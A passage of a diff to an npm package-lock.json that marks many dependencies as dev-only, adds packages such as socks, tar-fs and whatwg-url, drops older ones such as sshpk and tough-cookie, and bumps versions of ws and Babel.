"resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-3.0.7.tgz", - "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==" + "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==", + "dev": true }, "node_modules/sisteransi": { "version": "1.0.5", "resolved": "https://registry.npmjs.org/sisteransi/-/sisteransi-1.0.5.tgz", - "integrity": "sha512-bLGGlR1QxBcynn2d5YmDX4MGjlZvy2MRBDRNHLJ8VI6l6+9FUiyTFNJ0IveOSP0bcXgVDPRcfGqA0pjaqUpfVg==" + "integrity": "sha512-bLGGlR1QxBcynn2d5YmDX4MGjlZvy2MRBDRNHLJ8VI6l6+9FUiyTFNJ0IveOSP0bcXgVDPRcfGqA0pjaqUpfVg==", + "dev": true }, "node_modules/slash": { "version": "3.0.0", "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", + "dev": true, "engines": { "node": ">=8" } }, + "node_modules/smart-buffer": { + "version": "4.2.0", + "resolved": "https://registry.npmjs.org/smart-buffer/-/smart-buffer-4.2.0.tgz", + "integrity": "sha512-94hK0Hh8rPqQl2xXc3HsaBoOXKV20MToPkcXvwbISWLEs+64sBq5kFgn2kJDHb1Pry9yrP0dxrCI9RRci7RXKg==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">= 6.0.0", + "npm": ">= 3.0.0" + } + }, + "node_modules/socks": { + "version": "2.8.5", + "resolved": "https://registry.npmjs.org/socks/-/socks-2.8.5.tgz", + "integrity": "sha512-iF+tNDQla22geJdTyJB1wM/qrX9DMRwWrciEPwWLPRWAUEM8sQiyxgckLxWT1f7+9VabJS0jTGGr4QgBuvi6Ww==", + "dev": true, + "license": "MIT", + "dependencies": { + "ip-address": "^9.0.5", + "smart-buffer": "^4.2.0" + }, + "engines": { + "node": ">= 10.0.0", + "npm": ">= 3.0.0" + } + }, + "node_modules/socks-proxy-agent": { + "version": "8.0.5", + "resolved": "https://registry.npmjs.org/socks-proxy-agent/-/socks-proxy-agent-8.0.5.tgz", + "integrity": "sha512-HehCEsotFqbPW9sJ8WVYB6UbmIMv7kUUORIF2Nncq4VQvBfNBLibW9YZR5dlYCSUhwcD628pRllm7n+E+YTzJw==", + "dev": true, + "license": "MIT", + "dependencies": { + "agent-base": "^7.1.2", + "debug": "^4.3.4", + "socks": "^2.8.3" + }, + "engines": { + "node": ">= 14" + } + }, "node_modules/source-map": { "version": "0.6.1", "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.6.1.tgz", "integrity": "sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==", + "dev": true, "engines": { "node": ">=0.10.0" } @@ -3563,6 +3784,7 @@ "version": "0.5.13", "resolved": "https://registry.npmjs.org/source-map-support/-/source-map-support-0.5.13.tgz", "integrity": "sha512-SHSKFHadjVA5oR4PPqhtAVdcBWwRYVd6g6cAXnIbRiIwc2EhPrTuKUBdSLvlEKyIP3GCf89fltvcZiP9MMFA1w==", + "dev": true, "dependencies": { "buffer-from": "^1.0.0", "source-map": "^0.6.0" @@ -3571,37 +3793,14 @@ "node_modules/sprintf-js": { "version": "1.0.3", "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.0.3.tgz", - "integrity": "sha512-D9cPgkvLlV3t3IzL0D0YLvGA9Ahk4PcvVwUbN0dSGr1aP0Nrt4AEnTUbuGvquEC0mA64Gqt1fzirlRs5ibXx8g==" - }, - "node_modules/sshpk": { - "version": "1.17.0", - "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.17.0.tgz", - "integrity": "sha512-/9HIEs1ZXGhSPE8X6Ccm7Nam1z8KcoCqPdI7ecm1N33EzAetWahvQWVqLZtaZQ+IDKX4IyA2o0gBzqIMkAagHQ==", - "dev": true, - "dependencies": { - "asn1": "~0.2.3", - "assert-plus": "^1.0.0", - "bcrypt-pbkdf": "^1.0.0", - "dashdash": "^1.12.0", - "ecc-jsbn": "~0.1.1", - "getpass": "^0.1.1", - "jsbn": "~0.1.0", - "safer-buffer": "^2.0.2", - "tweetnacl": "~0.14.0" - }, - "bin": { - "sshpk-conv": "bin/sshpk-conv", - "sshpk-sign": "bin/sshpk-sign", - "sshpk-verify": "bin/sshpk-verify" - }, - "engines": { - "node": ">=0.10.0" - } + "integrity": "sha512-D9cPgkvLlV3t3IzL0D0YLvGA9Ahk4PcvVwUbN0dSGr1aP0Nrt4AEnTUbuGvquEC0mA64Gqt1fzirlRs5ibXx8g==", + "dev": true }, "node_modules/stack-utils": { "version": "2.0.6", "resolved": "https://registry.npmjs.org/stack-utils/-/stack-utils-2.0.6.tgz", "integrity": "sha512-XlkWvfIm6RmsWtNJx+uqtKLS8eqFbxUg0ZzLXqY0caEy9l7hruX8IpiDnjsLavoBgqCCR71TqWO8MaXYheJ3RQ==", + "dev": true, "dependencies": { "escape-string-regexp": "^2.0.0" }, @@ -3618,10 +3817,25 @@ "node": ">= 0.10.0" } }, + "node_modules/streamx": { + "version": "2.22.1", + "resolved": "https://registry.npmjs.org/streamx/-/streamx-2.22.1.tgz", + "integrity": "sha512-znKXEBxfatz2GBNK02kRnCXjV+AA4kjZIUxeWSr3UGirZMJfTE9uiwKHobnbgxWyL/JWro8tTq+vOqAK1/qbSA==", + "dev": true, + "license": "MIT", + "dependencies": { + "fast-fifo": "^1.3.2", + "text-decoder": "^1.1.0" + }, + "optionalDependencies": { + "bare-events": "^2.2.0" + } + }, "node_modules/string-length": { "version": "4.0.2", "resolved": "https://registry.npmjs.org/string-length/-/string-length-4.0.2.tgz", "integrity": "sha512-+l6rNN5fYHNhZZy41RXsYptCjA2Igmq4EG7kZAYFQI1E1VTXarr6ZPXBg6eq7Y6eK4FEhY6AJlyuFIb/v/S0VQ==", + "dev": true, "dependencies": { "char-regex": "^1.0.2", "strip-ansi": "^6.0.0" @@ -3634,6 +3848,7 @@ "version": "4.2.3", "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", + "dev": true, "dependencies": { "emoji-regex": "^8.0.0", "is-fullwidth-code-point": "^3.0.0", @@ -3647,6 +3862,7 @@ "version": "6.0.1", "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", + "dev": true, "dependencies": { "ansi-regex": "^5.0.1" }, @@ -3658,6 +3874,7 @@ "version": "4.0.0", "resolved": "https://registry.npmjs.org/strip-bom/-/strip-bom-4.0.0.tgz", "integrity": "sha512-3xurFv5tEgii33Zi8Jtp55wEIILR9eh34FAW00PZf+JnSsTmV/ioewSgQl97JHvgjoRGwPShsWm+IdrxB35d0w==", + "dev": true, "engines": { "node": ">=8" } @@ -3666,6 +3883,7 @@ "version": "2.0.0", "resolved": "https://registry.npmjs.org/strip-final-newline/-/strip-final-newline-2.0.0.tgz", "integrity": "sha512-BrpvfNAE3dcvq7ll3xVumzjKjZQ5tI1sEUIKr3Uoks0XUl45St3FlatVqef9prk4jRDzhW6WZg+3bk93y6pLjA==", + "dev": true, "engines": { "node": ">=6" } @@ -3674,6 +3892,7 @@ "version": "3.1.1", "resolved": "https://registry.npmjs.org/strip-json-comments/-/strip-json-comments-3.1.1.tgz", "integrity": "sha512-6fPc+R4ihwqP6N/aIv2f1gMH8lOVtWQHoqC4yK6oSDVVocumAsfCqjkXnqiYMhmMwS/mEHLp7Vehlt3ql6lEig==", + "dev": true, "engines": { "node": ">=8" }, @@ -3685,6 +3904,7 @@ "version": "7.2.0", "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dev": true, "dependencies": { "has-flag": "^4.0.0" }, @@ -3696,6 +3916,7 @@ "version": "1.0.0", "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", + "dev": true, "engines": { "node": ">= 0.4" }, @@ -3703,33 +3924,38 @@ "url": "https://github.com/sponsors/ljharb" } }, - "node_modules/tar": { - "version": "6.2.1", - "resolved": "https://registry.npmjs.org/tar/-/tar-6.2.1.tgz", - "integrity": "sha512-DZ4yORTwrbTj/7MZYq2w+/ZFdI6OZ/f9SFHR+71gIVUZhOQPHzVCLpvRnPgyaMpfWxxk/4ONva3GQSyNIKRv6A==", + "node_modules/tar-fs": { + "version": "3.0.10", + "resolved": "https://registry.npmjs.org/tar-fs/-/tar-fs-3.0.10.tgz", + "integrity": "sha512-C1SwlQGNLe/jPNqapK8epDsXME7CAJR5RL3GcE6KWx1d9OUByzoHVcbu1VPI8tevg9H8Alae0AApHHFGzrD5zA==", "dev": true, + "license": "MIT", "dependencies": { - "chownr": "^2.0.0", - "fs-minipass": "^2.0.0", - "minipass": "^5.0.0", - "minizlib": "^2.1.1", - "mkdirp": "^1.0.3", - "yallist": "^4.0.0" + "pump": "^3.0.0", + "tar-stream": "^3.1.5" }, - "engines": { - "node": ">=10" + "optionalDependencies": { + "bare-fs": "^4.0.1", + "bare-path": "^3.0.0" } }, - "node_modules/tar/node_modules/yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", - "dev": true + "node_modules/tar-stream": { + "version": "3.1.7", + "resolved": "https://registry.npmjs.org/tar-stream/-/tar-stream-3.1.7.tgz", + "integrity": "sha512-qJj60CXt7IU1Ffyc3NJMjh6EkuCFej46zUqJ4J7pqYlThyd9bO0XBTmcOIhSzZJVWfsLks0+nle/j538YAW9RQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "b4a": "^1.6.4", + "fast-fifo": "^1.2.0", + "streamx": "^2.15.0" + } }, "node_modules/test-exclude": { "version": "6.0.0", "resolved": "https://registry.npmjs.org/test-exclude/-/test-exclude-6.0.0.tgz", "integrity": "sha512-cAGWPIyOHU6zlmg88jwm7VRyXnMN7iV68OGAbYDk/Mh/xC/pzVPlQtY6ngoIH/5/tciuhGfvESU8GrHrcxD56w==", + "dev": true, "dependencies": { "@istanbuljs/schema": "^0.1.2", "glob": "^7.1.4", @@ -3739,15 +3965,27 @@ "node": ">=8" } }, + "node_modules/text-decoder": { + "version": "1.2.3", + "resolved": "https://registry.npmjs.org/text-decoder/-/text-decoder-1.2.3.tgz", + "integrity": "sha512-3/o9z3X0X0fTupwsYvR03pJ/DjWuqqrfwBgTQzdWDiQSm9KitAyz/9WqsT2JQW7KV2m+bC2ol/zqpW37NHxLaA==", + "dev": true, + "license": "Apache-2.0", + "dependencies": { + "b4a": "^1.6.4" + } + }, "node_modules/tmpl": { "version": "1.0.5", "resolved": "https://registry.npmjs.org/tmpl/-/tmpl-1.0.5.tgz", - "integrity": "sha512-3f0uOEAQwIqGuWW2MVzYg8fV/QNnc/IpuJNG837rLuczAaLVHslWHZQj4IGiEl5Hs3kkbhwL9Ab7Hrsmuj+Smw==" + "integrity": "sha512-3f0uOEAQwIqGuWW2MVzYg8fV/QNnc/IpuJNG837rLuczAaLVHslWHZQj4IGiEl5Hs3kkbhwL9Ab7Hrsmuj+Smw==", + "dev": true }, "node_modules/to-regex-range": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", "integrity": "sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==", + "dev": true, "dependencies": { "is-number": "^7.0.0" }, @@ -3755,23 +3993,18 @@ "node": ">=8.0" } }, - "node_modules/tough-cookie": { - "version": "2.5.0", - "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", - "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", + "node_modules/tr46": { + "version": "0.0.3", + "resolved": "https://registry.npmjs.org/tr46/-/tr46-0.0.3.tgz", + "integrity": "sha512-N3WMsuqV66lT30CrXNbEjx4GEwlow3v6rr4mCcv6prnfwhS01rkgyFdjPNBYd9br7LpXV1+Emh01fHnq2Gdgrw==", "dev": true, - "dependencies": { - "psl": "^1.1.28", - "punycode": "^2.1.1" - }, - "engines": { - "node": ">=0.8" - } + "license": "MIT" }, "node_modules/ts-jest": { "version": "29.2.5", "resolved": "https://registry.npmjs.org/ts-jest/-/ts-jest-29.2.5.tgz", "integrity": "sha512-KD8zB2aAZrcKIdGk4OwpJggeLcH1FgrICqDSROWqlnJXGCXK4Mn6FcdK2B6670Xr73lHMG1kHw8R87A0ecZ+vA==", + "dev": true, "dependencies": { "bs-logger": "^0.2.6", "ejs": "^3.1.10", @@ -3819,6 +4052,7 @@ "version": "7.6.3", "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", + "dev": true, "bin": { "semver": "bin/semver.js" }, @@ -3826,34 +4060,11 @@ "node": ">=10" } }, - "node_modules/tslib": { - "version": "2.6.0", - "resolved": "https://registry.npmjs.org/tslib/-/tslib-2.6.0.tgz", - "integrity": "sha512-7At1WUettjcSRHXCyYtTselblcHl9PJFFVKiCAy/bY97+BPZXSQ2wbq0P9s8tK2G7dFQfNnlJnPAiArVBVBsfA==", - "dev": true - }, - "node_modules/tunnel-agent": { - "version": "0.6.0", - "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", - "integrity": "sha512-McnNiV1l8RYeY8tBgEpuodCC1mLUdbSN+CYBL7kJsJNInOP8UjDDEwdk6Mw60vdLLrr5NHKZhMAOSrR2NZuQ+w==", - "dev": true, - "dependencies": { - "safe-buffer": "^5.0.1" - }, - "engines": { - "node": "*" - } - }, - "node_modules/tweetnacl": { - "version": "0.14.5", - "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", - "integrity": "sha512-KXXFFdAbFXY4geFIwoyNK+f5Z1b7swfXABfL7HXCmoIWMKU3dmS26672A4EeQtDzLKy7SXmfBu51JolvEKwtGA==", - "dev": true - }, "node_modules/type-detect": { "version": "4.0.8", "resolved": "https://registry.npmjs.org/type-detect/-/type-detect-4.0.8.tgz", "integrity": "sha512-0fr/mIH1dlO+x7TlcMy+bIDqKPsw/70tVyeHW787goQjhmqaZe10uwLujubK9q9Lg6Fiho1KUKDYz0Z7k7g5/g==", + "dev": true, "engines": { "node": ">=4" } @@ -3862,6 +4073,7 @@ "version": "0.21.3", "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.21.3.tgz", "integrity": "sha512-t0rzBq87m3fVcduHDUFhKmyyX+9eo6WQjZvf51Ea/M0Q7+T374Jp1aUiyUl0GKxp8M/OETVHSDvmkyPgvX+X2w==", + "dev": true, "engines": { "node": ">=10" }, @@ -3873,6 +4085,7 @@ "version": "5.7.2", "resolved": "https://registry.npmjs.org/typescript/-/typescript-5.7.2.tgz", "integrity": "sha512-i5t66RHxDvVN40HfDd1PsEThGNnlMCMT3jMUuoh9/0TaqWevNontacunWyN02LA9/fIbEWlcHZcgTKb9QoaLfg==", + "dev": true, "peer": true, "bin": { "tsc": "bin/tsc", @@ -3883,14 +4096,17 @@ } }, "node_modules/undici-types": { - "version": "6.19.8", - "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-6.19.8.tgz", - "integrity": "sha512-ve2KP6f/JnbPBFyobGHuerC9g1FYGn/F8n1LWTwNxCEzd6IfqTwUQcNXgEtmmQ6DlRrC1hrSrBnCZPokRrDHjw==" + "version": "6.21.0", + "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-6.21.0.tgz", + "integrity": "sha512-iwDZqg0QAGrg9Rav5H4n0M64c3mkR59cJ6wQp+7C4nI0gsmExaedaYLNO44eT4AtBBwjbTiGPMlt2Md0T9H9JQ==", + "dev": true, + "license": "MIT" }, "node_modules/update-browserslist-db": { "version": "1.1.1", "resolved": "https://registry.npmjs.org/update-browserslist-db/-/update-browserslist-db-1.1.1.tgz", "integrity": "sha512-R8UzCaa9Az+38REPiJ1tXlImTJXlVfgHZsglwBD/k6nj76ctsH1E3q4doGrukiLQd3sGQYu56r5+lo5r94l29A==", + "dev": true, "funding": [ { "type": "opencollective", @@ -3916,29 +4132,11 @@ "browserslist": ">= 4.21.0" } }, - "node_modules/uri-js": { - "version": "4.4.1", - "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", - "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", - "dev": true, - "dependencies": { - "punycode": "^2.1.0" - } - }, - "node_modules/uuid": { - "version": "3.4.0", - "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", - "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==", - "deprecated": "Please upgrade to version 7 or higher. Older versions may use Math.random() in certain circumstances, which is known to be problematic. See https://v8.dev/blog/math-random for details.", - "dev": true, - "bin": { - "uuid": "bin/uuid" - } - }, "node_modules/v8-to-istanbul": { "version": "9.3.0", "resolved": "https://registry.npmjs.org/v8-to-istanbul/-/v8-to-istanbul-9.3.0.tgz", "integrity": "sha512-kiGUalWN+rgBJ/1OHZsBtU4rXZOfj/7rKQxULKlIzwzQSvMJUUNgPwJEEh7gU6xEVxC0ahoOBvN2YI8GH6FNgA==", + "dev": true, "dependencies": { "@jridgewell/trace-mapping": "^0.3.12", "@types/istanbul-lib-coverage": "^2.0.1", @@ -3948,32 +4146,38 @@ "node": ">=10.12.0" } }, - "node_modules/verror": { - "version": "1.10.0", - "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", - "integrity": "sha512-ZZKSmDAEFOijERBLkmYfJ+vmk3w+7hOLYDNkRCuRuMJGEmqYNCNLyBBFwWKVMhfwaEF3WOd0Zlw86U/WC/+nYw==", - "dev": true, - "engines": [ - "node >=0.6.0" - ], - "dependencies": { - "assert-plus": "^1.0.0", - "core-util-is": "1.0.2", - "extsprintf": "^1.2.0" - } - }, "node_modules/walker": { "version": "1.0.8", "resolved": "https://registry.npmjs.org/walker/-/walker-1.0.8.tgz", "integrity": "sha512-ts/8E8l5b7kY0vlWLewOkDXMmPdLcVV4GmOQLyxuSswIJsweeFZtAsMF7k1Nszz+TYBQrlYRmzOnr398y1JemQ==", + "dev": true, "dependencies": { "makeerror": "1.0.12" } }, + "node_modules/webidl-conversions": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/webidl-conversions/-/webidl-conversions-3.0.1.tgz", + "integrity": "sha512-2JAn3z8AR6rjK8Sm8orRC0h/bcl/DqL7tRPdGZ4I1CjdF+EaMLmYxBHyXuKL849eucPFhvBoxMsflfOb8kxaeQ==", + "dev": true, + "license": "BSD-2-Clause" + }, + "node_modules/whatwg-url": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/whatwg-url/-/whatwg-url-5.0.0.tgz", + "integrity": "sha512-saE57nupxk6v3HY35+jzBwYa0rKSy0XR8JSxZPwgLr7ys0IBzhGviA1/TUGJLmSVqs8pb9AnvICXEuOHLprYTw==", + "dev": true, + "license": "MIT", + "dependencies": { + "tr46": "~0.0.3", + "webidl-conversions": "^3.0.0" + } + }, "node_modules/which": { "version": "2.0.2", "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", + "dev": true, "dependencies": { "isexe": "^2.0.0" }, @@ -3988,6 +4192,7 @@ "version": "7.0.0", "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", + "dev": true, "dependencies": { "ansi-styles": "^4.0.0", "string-width": "^4.1.0", @@ -4003,12 +4208,14 @@ "node_modules/wrappy": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", - "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==" + "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==", + "dev": true }, "node_modules/write-file-atomic": { "version": "4.0.2", "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-4.0.2.tgz", "integrity": "sha512-7KxauUdBmSdWnmpaGFg+ppNjKF8uNLry8LyzjauQDOVONfFLNKrKvQOxZ/VuTIcS/gge/YNahf5RIIQWTSarlg==", + "dev": true, "dependencies": { "imurmurhash": "^0.1.4", "signal-exit": "^3.0.7" @@ -4018,10 +4225,11 @@ } }, "node_modules/ws": { - "version": "8.13.0", - "resolved": "https://registry.npmjs.org/ws/-/ws-8.13.0.tgz", - "integrity": "sha512-x9vcZYTrFPC7aSIbj7sRCYo7L/Xb8Iy+pW0ng0wt2vCJv7M9HOMy0UoN3rr+IFC7hb7vXoqS+P9ktyLLLhO+LA==", + "version": "8.18.2", + "resolved": "https://registry.npmjs.org/ws/-/ws-8.18.2.tgz", + "integrity": "sha512-DMricUmwGZUVr++AEAe2uiVM7UoO9MAVZMDu05UQOaUII0lp+zOzLLU4Xqh/JvTqklB1T4uELaaPBKyjE1r4fQ==", "dev": true, + "license": "MIT", "engines": { "node": ">=10.0.0" }, @@ -4042,6 +4250,7 @@ "version": "5.0.8", "resolved": "https://registry.npmjs.org/y18n/-/y18n-5.0.8.tgz", "integrity": "sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA==", + "dev": true, "engines": { "node": ">=10" } @@ -4049,12 +4258,14 @@ "node_modules/yallist": { "version": "3.1.1", "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.1.1.tgz", - "integrity": "sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==" + "integrity": "sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==", + "dev": true }, "node_modules/yargs": { "version": "17.7.2", "resolved": "https://registry.npmjs.org/yargs/-/yargs-17.7.2.tgz", "integrity": "sha512-7dSzzRQ++CKnNI/krKnYRV7JKKPUXMEh61soaHKg9mrWEhzFWhFnxPxGl+69cD1Ou63C13NUPCnmIcrvqCuM6w==", + "dev": true, "dependencies": { "cliui": "^8.0.1", "escalade": "^3.1.1", @@ -4072,6 +4283,7 @@ "version": "21.1.1", "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz", "integrity": "sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==", + "dev": true, "engines": { "node": ">=12" } @@ -4080,6 +4292,7 @@ "version": "0.1.0", "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-0.1.0.tgz", "integrity": "sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q==", + "dev": true, "engines": { "node": ">=10" }, @@ -4093,30 +4306,34 @@ "version": "2.2.1", "resolved": "https://registry.npmjs.org/@ampproject/remapping/-/remapping-2.2.1.tgz", "integrity": "sha512-lFMjJTrFL3j7L9yBxwYfCq2k6qqwHyzuUl/XBnif78PWTJYyL/dfowQHWE3sp6U6ZzqWiiIZnpTMO96zhkjwtg==", + "dev": true, "requires": { "@jridgewell/gen-mapping": "^0.3.0", "@jridgewell/trace-mapping": "^0.3.9" } }, "@babel/code-frame": { - "version": "7.26.2", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.26.2.tgz", - "integrity": "sha512-RJlIHRueQgwWitWgF8OdFYGZX328Ax5BCemNGlqHfplnRT9ESi8JkFlvaVYbS+UubVY6dpv87Fs2u5M29iNFVQ==", + "version": "7.27.1", + "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.27.1.tgz", + "integrity": "sha512-cjQ7ZlQ0Mv3b47hABuTevyTuYN4i+loJKGeV9flcCgIK37cCXRh+L1bd3iBHlynerhQ7BhCkn2BPbQUL+rGqFg==", + "dev": true, "requires": { - "@babel/helper-validator-identifier": "^7.25.9", + "@babel/helper-validator-identifier": "^7.27.1", "js-tokens": "^4.0.0", - "picocolors": "^1.0.0" + "picocolors": "^1.1.1" } }, "@babel/compat-data": { "version": "7.26.2", "resolved": "https://registry.npmjs.org/@babel/compat-data/-/compat-data-7.26.2.tgz", - "integrity": "sha512-Z0WgzSEa+aUcdiJuCIqgujCshpMWgUpgOxXotrYPSA53hA3qopNaqcJpyr0hVb1FeWdnqFA35/fUtXgBK8srQg==" + "integrity": "sha512-Z0WgzSEa+aUcdiJuCIqgujCshpMWgUpgOxXotrYPSA53hA3qopNaqcJpyr0hVb1FeWdnqFA35/fUtXgBK8srQg==", + "dev": true }, "@babel/core": { "version": "7.26.0", "resolved": "https://registry.npmjs.org/@babel/core/-/core-7.26.0.tgz", "integrity": "sha512-i1SLeK+DzNnQ3LL/CswPCa/E5u4lh1k6IAEphON8F+cXt0t9euTshDru0q7/IqMa1PMPz5RnHuHscF8/ZJsStg==", + "dev": true, "requires": { "@ampproject/remapping": "^2.2.0", "@babel/code-frame": "^7.26.0", @@ -4139,6 +4356,7 @@ "version": "7.26.2", "resolved": "https://registry.npmjs.org/@babel/generator/-/generator-7.26.2.tgz", "integrity": "sha512-zevQbhbau95nkoxSq3f/DC/SC+EEOUZd3DYqfSkMhY2/wfSeaHV1Ew4vk8e+x8lja31IbyuUa2uQ3JONqKbysw==", + "dev": true, "requires": { "@babel/parser": "^7.26.2", "@babel/types": "^7.26.0", @@ -4151,6 +4369,7 @@ "version": "7.25.9", "resolved": "https://registry.npmjs.org/@babel/helper-compilation-targets/-/helper-compilation-targets-7.25.9.tgz", "integrity": "sha512-j9Db8Suy6yV/VHa4qzrj9yZfZxhLWQdVnRlXxmKLYlhWUVB1sB2G5sxuWYXk/whHD9iW76PmNzxZ4UCnTQTVEQ==", + "dev": true, "requires": { "@babel/compat-data": "^7.25.9", "@babel/helper-validator-option": "^7.25.9", @@ -4163,6 +4382,7 @@ "version": "7.25.9", "resolved": "https://registry.npmjs.org/@babel/helper-module-imports/-/helper-module-imports-7.25.9.tgz", "integrity": "sha512-tnUA4RsrmflIM6W6RFTLFSXITtl0wKjgpnLgXyowocVPrbYrLUXSBXDgTs8BlbmIzIdlBySRQjINYs2BAkiLtw==", + "dev": true, "requires": { "@babel/traverse": "^7.25.9", "@babel/types": "^7.25.9" @@ -4172,6 +4392,7 @@ "version": "7.26.0", "resolved": "https://registry.npmjs.org/@babel/helper-module-transforms/-/helper-module-transforms-7.26.0.tgz", "integrity": "sha512-xO+xu6B5K2czEnQye6BHA7DolFFmS3LB7stHZFaOLb1pAwO1HWLS8fXA+eh0A2yIvltPVmx3eNNDBJA2SLHXFw==", + "dev": true, "requires": { "@babel/helper-module-imports": "^7.25.9", "@babel/helper-validator-identifier": "^7.25.9", @@ -4181,44 +4402,51 @@ "@babel/helper-plugin-utils": { "version": "7.25.9", "resolved": "https://registry.npmjs.org/@babel/helper-plugin-utils/-/helper-plugin-utils-7.25.9.tgz", - "integrity": "sha512-kSMlyUVdWe25rEsRGviIgOWnoT/nfABVWlqt9N19/dIPWViAOW2s9wznP5tURbs/IDuNk4gPy3YdYRgH3uxhBw==" + "integrity": 